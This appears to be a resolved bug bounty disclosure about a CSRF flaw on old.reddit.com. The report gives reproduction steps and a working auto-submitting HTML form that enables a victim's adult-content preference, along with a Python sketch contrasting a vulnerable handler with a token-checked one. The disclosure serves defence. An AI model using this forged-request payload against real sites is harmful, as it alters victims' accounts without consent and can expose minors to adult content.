CSRF (protection bypassed) to force a below 18 user into viewing an nsfw subreddit!
Team Summary
Official summary from Reddit
# Summary of the Issue

A state-changing POST request to https://old.reddit.com/over18? lacked a proper modhash validator, leaving the sensitive action vulnerable to CSRF attacks. An attacker can trick users into executing the action, enabling/disabling the "I am over eighteen years old and willing to view adult content" preference in the victim account.

# Steps to reproduce

1. Create a reddit account and go to https://old.reddit.com/prefs/
2. Scroll down and you'll see an option saying "I am over eighteen years old and willing to view adult content". Turn that off.
3. Visit an nsfw subreddit https://www.reddit.com/r/<nsfw_subreddit_here> and you'll see a window asking if you want to see nsfw content.
4. Open an HTML file with the HTML content shown below.
5. Settings will get updated and you'll be able to view nsfw content. In other words, you'll be able to view https://www.reddit.com/r/<nsfw_subreddit_here>

```
<html>
  <body>
    <form action="https://old.reddit.com/over18?dest=https%3A%2F%2Fold.reddit.com%2Fr%2F<nsfw_subreddit_here>%2F" method="POST">
      <input type="hidden" name="over18" value="yes" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
```
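The missing check described in the summary, shown as an added Python example that is not Reddit's code: a handler that changes the preference on the session cookie alone, beside one that first requires a per-session token. The HMAC token derivation, the `modhash` form field name, the session dictionary and all function names are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets
from typing import Optional

# Hypothetical server secret; a real deployment loads this from protected config.
SERVER_SECRET = secrets.token_bytes(32)


def issue_modhash(session_id: str) -> str:
    """Derive the per-session anti-CSRF token the site embeds in its own forms."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def modhash_valid(session_id: str, submitted: Optional[str]) -> bool:
    """Constant-time comparison; a missing or empty token is always invalid."""
    if not submitted:
        return False
    expected = issue_modhash(session_id).encode()
    return hmac.compare_digest(expected, submitted.encode())


def handle_over18_vulnerable(session: dict, form: dict) -> int:
    """Behaviour described in the report: the cookie alone authorises the change."""
    session["over18"] = form.get("over18") == "yes"
    return 302


def handle_over18_hardened(session: dict, form: dict) -> int:
    """Reject the state change unless the form carries this session's token."""
    if not modhash_valid(session["id"], form.get("modhash")):
        return 403
    session["over18"] = form.get("over18") == "yes"
    return 302


def demo() -> dict:
    # Constructed sample data: a cross-site form cannot read the victim's token,
    # so the forged body carries only the over18 field.
    forged = {"over18": "yes"}
    victim_a = {"id": "sess-constructed-1", "over18": False}
    victim_b = {"id": "sess-constructed-1", "over18": False}
    legit = {"over18": "yes", "modhash": issue_modhash("sess-constructed-1")}
    return {
        "vulnerable_forged": (handle_over18_vulnerable(victim_a, forged), victim_a["over18"]),
        "hardened_forged": (handle_over18_hardened(victim_b, forged), victim_b["over18"]),
        "hardened_legit": (handle_over18_hardened(victim_b, legit), victim_b["over18"]),
    }
```
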
Report Details
Additional information and metadata
State
Closed
Substate
Resolved
Submitted
Weakness
Cross-Site Request Forgery (CSRF)